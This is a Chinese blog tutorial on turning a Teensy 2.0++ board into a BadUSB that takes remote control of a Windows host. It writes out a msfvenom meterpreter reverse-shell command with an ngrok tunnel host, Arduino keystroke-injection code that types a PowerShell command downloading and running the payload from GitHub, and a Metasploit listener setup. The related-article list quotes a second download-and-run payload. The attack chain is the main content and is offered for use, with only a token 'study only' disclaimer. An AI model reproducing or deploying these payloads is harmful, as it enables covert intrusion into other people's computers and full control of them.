渗透利器-BadUSB 控制外网主机详解 Teensy2.0++

最新推荐文章于 2024-08-05 19:39:45 发布
最新推荐文章于 2024-08-05 19:39:45 发布
阅读量887 收藏 6
点赞数
分类专栏: linux 文章标签: bash linux windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaogui_666/article/details/122389232
版权

准备工作
一块 Teensy2.0++ 的板子(淘宝一搜就有)
Arduino编译器
1.8.7版本下载连接:arduino下载地址
Teensy插件
下载连接:Teensy下载地址

1.下载好arduino后直接解压

 /home/da1sy/arduino-1.8.7# ./arduino

2.安装Teensy插件

 /home/da1sy/arduino-1.8.7# ./TeensyduinoInstall.linux64

注意将插件安装到arduino的解压目录下

3.arduino修改配置
打开软件后将 工具 下配置修改

4.利用ngrok实现内网穿透
在https://www.ngrok.cc/ 注册账号后开通tcp隧道

下载客户端

/home/da1sy/桌面/linux_amd64# ./sunny clientid 隧道ID号

5.利用msfvenom生成windows端木马

 /home/da1sy# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=free.idcfengye.com lport=17839 -f exe > windows.exe

lhost 为运行sunny后的域名,lport为开通隧道时填写的端口(运行后也会有显示)
最后将生成的木马放到github项目上实现远程下载
6.编辑arduino代码

char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://raw.githubusercontent.com/da1sy/da1sy/master/windows.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file); ";
char *command2 = "%HOMEPATH%\\windows.exe ";
//将连接的地址改为自己github的地址
void setup() { 
    delay(5000);
    omg(command1);
    delay(15000);
    omg(command2);
 }
  
void loop() {}

void omg(char *SomeCommand)
{
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now(); 
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  delay(1500);
  Keyboard.println(SomeCommand);
}

编辑好后点验证,然后插入Teensy板子,最后按一下板子上的按钮完成上传
7.metasploit开启监听

/home/da1sy/# msfconsole

msf > use exploit/multi/handler
msf exploit(multi/handler) > set lhost 127.0.0.1   
msf exploit(multi/handler) > set lport 6666        //ngrok开通隧道时填写的本地地址与端口号
msf exploit(multi/handler) > exploit

8.最后对目标插入badusb

9,这一步回到监听的电脑上即可看到反弹的shell,即可对肉鸡进行随意操作。
此教程经用学习,请勿用于危害国家和社会。

][1!
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BadUSB教程
Canicula_1的博客
10-07 2233
BadUSB环境配置教程 可以解决的问题包括: 编译时最后出现:exit status 1 DigiKeyboard.h对应多个库-----这个搜索电脑里的这个库,除了使用编辑器文件夹下的,统统删掉。 1、文件-首选项-开发板网址: http://digistump.com/package_digistump_index.json 2、在编辑器对应的库中添加文件 Digis...
badusb代码_badusb攻击代码
weixin_39887183的博客
11-28 2445
badusb攻击(msfconsole)准备badusbArduino下载软件点击下载运行软件在工具菜单中 选择,选择badusb的端口和开发版。注入代码windows10系统#includevoidsetup(){Keyboard.begin();//开始键盘通讯delay(1000);//延时Keyboard.press(KEY_LEFT_GUI);//win键delay(50...
一个U盘黑掉你:TEENSY实战
weixin_30745553的博客
01-23 407
从传统意义讲,当你在电脑中插入一张CD/DVD光盘,或者插入一个USB设备时,可以通过自动播放来运行一个包含恶意的文件,不过自动播放功能被关闭时,autorun.inf文件就无法自动执行你的文件了。然而通过TEENSY,你可以模拟出一个键盘和鼠标,当你插入这个定制的USB设备时,电脑会识别为一个键盘,利用设备中的微处理器,与存储空间,和编程进去的攻击代码,就可以向主机发送控制命令,从而完全控制...
使用teensy 2.0++ 开发板模拟U盘
atmgnd的博客
05-02 2350
Teensy 开发板简介 teensy 是一种基于AVR或ARM处理器的USB开发板, 可以用来开发或试验各种USB应用, 我购买的为TEENSY 2.0++开发板, 因为这是在国内所有TEENSY 开发板中最为便宜的型号. 它大概长下面这个样子. 好了, 由于电子科技的快速发展, 如今U盘的容量动不动就为好几百GB了, 那么这样U盘的基本原理又是怎样的呢? 又如何能在只花几十人民币...
BadUSB —— Teensy++2.0
weixin_30301449的博客
03-02 371
参考http://bbs.pediy.com/showthread.php?t=213719 前几天发现了BadUSB这个好玩的东西,橡皮鸭和烧鹅都买不起就在某宝上买了个Teensy++2.0 1.下载Teensyduino。 https://www.pjrc.com/teensy/td_download.html 2.安装Arduino。我这里安装1.8.0 https://pan.b...
BadUSB制作基础(基于Teensy++2.0)
r250414958的博客
01-01 844
我这里用的Teensy++2.0的板子,因为看上了它的特点:Windows免驱动,某宝上有卖 首先搭开发环境: windows7_64_专业版 ARDUINO 1.8.12 https://www.arduino.cc/en/main/OldSoftwareReleases Teensyduino Version 1.53 https://www.pjrc.com/teensy/td_download.html 先装的 ARDUINO 再装 Teensyduino 安装完成后在工具栏里选择对应的板,以及us
[视频]K8飞刀 BadUSB Teensy自动种马演示教程
weixin_30378623的博客
03-05 878
[视频]K8飞刀 Teensy USB自动种马演示教程 链接: https://pan.baidu.com/s/13bM1XSLrhlf90FDmPGfo1g 提取码: gy2q 源码:https://github.com/k8gege/k8badusb K8飞刀生成添加管理员Teensy脚本 K8飞刀生成 全网唯一同时兼容所有Windows系统以及Linux系统下载者 转载于:http...
Badusb原理及制作并简单免杀实现远控教程
热门推荐
天乐的博客
10-23 1万+
2014年美国黑帽大会上研究人员JakobLell和Karsten Nohl展示了badusb的攻击方法后,国内与badusb相关的文章虽然有了一些,但是大部分人把相关文章都阅读后还是会有种“不明觉厉”的感觉,badusb仍有一层朦胧的面纱。本文将带你揭开这层神秘的面纱。 Badusb原理:利用HID(Human InterfaceDevice,是计算机直接与人交互的设备,例如键盘、鼠标等)进行攻击,将USB设备伪装使电脑识别为键盘,再利用USB设备中的微控制芯片,向主机发送命令,从而实现完全控制主机。 漏
teensy 制作键盘 linux,利用Arduino快速制作Teensy BadUSB
weixin_39617113的博客
05-15 465
*本文原创作者:维克斯0x00 介绍本文想以较简单的方式,叙述Arduino版BadUSB的制作过程。我知道在这之前已经有很多前辈都写过相关的文章,但小白可能还有点迷糊,所以这篇文章是快速带大家入门了解,我也是菜B大神不要喷,谢谢~。“BadUSB”是计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在2014年的BlackHat安全大会上公布。虽然...
BadUSB超详细制作, 实现CobaltStrike远控上线
xf555er的博客
12-11 2504
BadUSB是利用了USB协议上的漏洞,通过更改USB的内部固件,在正常的USB接口接入后,模拟外置鼠标、键盘的功能,以此来使目标主机执行已经精心构造好的命令。在此过程中不会引起杀毒软件、防火墙的一丝怀疑。而且因为是在固件级别的应用,U盘格式化根本无法阻止其内部代码的执行。
badusb代码.zip
07-25
分享一款badusb的代码,测试过还是可以正常使用。希望帮到有需要的小伙伴。
virulent:使用Teensy 2.0 ++的暴力键盘项目的固件
05-21
有毒 使用Teensy 2.0 ++的暴力键盘项目的固件。
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
学习笔记---Teensy USB HID
dozelive技术分享
09-13 1566
转:http://www.tuicool.com/articles/nyY3i2 Kautilya is a toolkit which provides various payloads for a Human Interface Device which may help in breaking in a computer during penetration
BadUSB实现中,teensy版和ardunio Leonardo板子的区别
kittygilr的博客
01-25 3922
用单片机最小系统来实现BadUSB攻击,一种是用teensy开发板,一种是Leonard开发板。 这teensy2.0和leonard开发板,都使用相同的avr芯片atmega32u4,(teensy2.0和leonard使用的都是这款芯片,teeny2.0后续版本有所不同,参见 https://www.pjrc.com/teensy/ https://www.pjrc.com/teensy/te...
利用badusb远程控制
weixin_43211186的博客
01-07 4336
0x01 badusb简介 badusb大家应该都了解过,是利用伪造HID设备执行攻击载荷的一种攻击方式。HID设备一般指的是计算机直接与人交互的设备,例如键盘、鼠标等 总的来说,就是将USB设备伪装成键盘设备,使目标主机被迫执行预置在固件中的恶意代码 通常情况下都会把badusb制作成与U盘极其相似,且不会被受害者所察觉,badusb目前在淘宝有售,下面是详细的用badusb拿shell的过程 ...
BadUsb程序大全-值得收藏
门柚的博客
07-31 1636
BadUsb程序大全-值得收藏
利用Arduino快速制作Teensy BadUSB, 攻击计算机
weixin_33929309的博客
08-23 676
  BadUsb介绍   BadUSB是计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在2014年的BlackHat安全大会上公布。 虽然已隔一两年,但还是有人在研究它,它的攻击方式也多种多样。   使用他们的代码做了个类似的U盘,用户插入U盘,就会自动执行预置在固件中的恶意代码,下载服务器上恶意文件,执行恶意操作——注意,这里的U盘自动运行可...
Arduino、bootloader、BadUSB、及其相关硬件知识入门学习
weixin_30920091的博客
06-19 100
内容中包含 base64string 图片造成字符过多,拒绝显示 转载于:https://www.cnblogs.com/LittleHann/p/5570000.html
bash和sh的区别
最新发布
qq_43700885的博客
08-05 548
Bash和‌sh的主要区别在于它们的交互性、兼容性、默认shell以及脚本执行方式。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值